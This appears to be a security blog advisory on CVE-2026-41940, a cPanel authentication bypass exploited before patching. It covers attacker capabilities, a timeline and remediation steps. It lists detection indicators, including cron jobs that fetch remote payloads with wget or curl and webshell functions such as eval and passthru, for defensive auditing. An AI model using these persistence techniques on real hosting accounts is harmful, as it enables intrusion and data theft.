CVE-2026-41940: cPanel Auth Bypass Exploited 70+ Days Before Patch

cPanel's authentication bypass vulnerability CVE-2026-41940 has been actively exploited in the wild since February 23, 2026. The patch arrived more than 70 days later. cPanel powers approximately 60% of the world's web hosting control panels — making this one of the most widely exploited unpatched authentication vulnerabilities of 2026.

If your website runs on shared or VPS hosting with cPanel, your hosting account may have been accessible to unauthorised parties for over two months. The exposure window is February 23 through the date your hosting provider updated to cPanel 122.0.17 or later. Not all hosting providers patched on the same day.

What CVE-2026-41940 Does

CVE-2026-41940 is an authentication bypass in cPanel's login flow. The specific flaw is in how cPanel handles session token validation for the cPanel user interface and the WHM (WebHost Manager) admin interface.

A crafted HTTP request to the cPanel login endpoint with specific header manipulation bypasses the credential check entirely, establishing an authenticated session without submitting valid username and password credentials. The bypass does not require prior access to any account credentials, API tokens, or SSH keys. Any network-accessible cPanel installation is vulnerable.

Once an attacker has an authenticated cPanel session, the access available is the full scope of that cPanel user account:

• File Manager: Read, write, delete, and upload files in the web root and any directory accessible to the hosting account. This means full access to website files, including the ability to plant webshells, modify PHP files to include malicious code, or exfiltrate sensitive files.
• Database access: View and modify MySQL/MariaDB databases. For WordPress sites, Magento stores, or any database-backed application, this means access to all user data, credentials, and content stored in the database.
• Email accounts: Read, send, and configure email accounts on the domain. Attackers use this to send phishing at scale from legitimate domain email addresses.
• SSH key management: Add new authorised SSH keys to the hosting account. An attacker who adds their SSH key maintains persistent access even after the cPanel vulnerability is patched.
• Cron jobs: Add scheduled tasks that run code on the server at defined intervals. A malicious cron job can maintain persistence, exfiltrate data, or run miners.
• Addon domain management: Add new domains to the hosting account for phishing or malware distribution.

The 70-Day Exploitation Window

The timeline that makes CVE-2026-41940 particularly serious:

• February 23, 2026: First confirmed exploitation observed (forensic logs from a security researcher's honeypot hosting account)
• February 23 - late April 2026: Active exploitation against real hosting accounts. Attribution is to multiple unrelated threat actors — the exploit was either independently discovered or shared through underground channels
• Late April 2026: cPanel Inc. releases version 122.0.17 containing the fix
• April 30 - May 2, 2026: HelpNet Security and BleepingComputer report the disclosure
• Today (May 2, 2026): The exploitation window was approximately 67-70 days

The 70-day window between first exploitation and public patch is significantly longer than the industry norm for critical authentication vulnerabilities. The exploitation was silent — no public CVE, no coordinated disclosure — meaning defenders had no indication an attack was ongoing.

The attacker profile during the 70-day window was mixed:

• Automated scanner bots exploiting at scale (adding SSH keys for persistent access, installing coin miners in cron jobs)
• Targeted manual exploitation against high-value hosting accounts (e-commerce sites, established domain names with email reputation, sites with database access to valuable data)
• Initial access brokers selling access to compromised hosting accounts for downstream use by ransomware groups or spammers

Check If Your Account Was Compromised

Even after patching, the persistence mechanisms attackers installed during the exploitation window remain active. Patching stops new exploitation — it does not clean up an already-compromised account.

Step 1: Check authorised SSH keys

In your cPanel control panel, go to Security > SSH Access. Review every authorised key listed. If you see any keys you did not add, or keys added in the February 23 - late April window that you did not authorise, remove them immediately and rotate your SSH credentials.

Step 2: Audit cron jobs

In cPanel, go to Advanced > Cron Jobs. Review every scheduled task. Malicious cron jobs typically:

• Run from temporary directories (/tmp, /var/tmp, obscure subdirectories)
• Execute base64-encoded commands or download scripts from external URLs
• Run as wget or curl fetching remote payloads
• Are scheduled to run every minute (unusual for legitimate jobs)

Delete any cron job you did not create. Log the command string before deletion in case forensic review is needed.

Step 3: Scan website files for webshells

Webshells are PHP files placed in your web root that allow an attacker to execute arbitrary commands via a web browser. Common patterns:

• Files with names like config2.php, wp-update.php, .php files in image upload directories
• PHP files containing base64_decode, eval, system, exec, or passthru functions in obfuscated code
• Files modified in the February 23 - late April window that you did not modify

Tools: Wordfence (if WordPress), Imunify360 (if your host uses it), or manual review of recently modified files via File Manager sorted by modification date.

Step 4: Check database integrity

Export your database and review it for unexpected admin user accounts, injected content in post/product tables, or new user registrations during the exploitation window. WordPress sites specifically: check wp_users for accounts you did not create.

Step 5: Review email sending logs

Check cPanel's Email > Track Delivery for outbound email you did not send. Attackers use compromised hosting email accounts to send phishing or spam, which can result in your domain's email reputation being blacklisted.

How to Verify Your cPanel Version

In cPanel, scroll to the bottom of any page — the version number appears in the footer. In WHM, go to Server Status > cPanel Status or navigate to the version display in the top right.

Patched versions: cPanel 122.0.17 and later.

If your hosting provider has not yet patched, contact them immediately and request an upgrade. cPanel EasyApache and automatic updates should have pushed 122.0.17 to most providers, but smaller or managed hosting providers may lag.

If you manage your own cPanel server (VPS or dedicated), run the update manually: /scripts/upcp --force

Why This Pattern Keeps Repeating

cPanel is not the first widely deployed hosting control panel to carry a critical authentication vulnerability for an extended exploitation window. Plesk (2024), WHMCS (2023), and DirectAdmin (2022) have all had similar patterns. The common thread: hosting control panel software is maintained by smaller teams than hyperscaler cloud providers, faces slow update adoption across a highly fragmented hosting provider ecosystem, and controls access to extremely high-value data (websites, databases, email) that makes it a priority target.

The 60% market share of cPanel means any critical authentication flaw has a blast radius measured in millions of websites. Attackers rationally prioritise these targets.

For developers and teams running websites on shared or VPS hosting with cPanel: treat this as a prompt to evaluate whether managed hosting (where the provider handles security updates, implements WAF, and runs malware scanning) is preferable to self-managed cPanel. The operational overhead of auditing for a 70-day unannounced compromise is not trivial.

Key Takeaways

• CVE-2026-41940: cPanel authentication bypass; unauthenticated session creation via crafted login request; full account access including files, databases, SSH keys, cron jobs, and email
• 70-day exploitation window: February 23 - late April 2026, exploited silently before public disclosure; no CVE advisory or coordinated disclosure during exploitation
• Patch: cPanel 122.0.17+: update via your hosting provider or run /scripts/upcp --force on self-managed cPanel; most providers have patched but verify
• Patch does not clean up: even after patching, check for persistent SSH keys (Security > SSH Access), malicious cron jobs (Advanced > Cron Jobs), webshells in web root, and database tampering from the exploitation window
• Attacker activity during the window: automated SSH key injection, coin miner installation via cron, targeted data theft from e-commerce databases, email account abuse for phishing
• Pattern: cPanel, Plesk, WHMCS repeat this vulnerability pattern — consider managed hosting where provider handles security updates if operational audit overhead is a constraint

For the ConnectWise ScreenConnect RCE that also has a CISA May 12 deadline, read CVE-2026-32202: ConnectWise ScreenConnect RCE. For the LiteLLM credential theft pattern, read CVE-2026-42208: LiteLLM SQL Injection Leaks API Keys.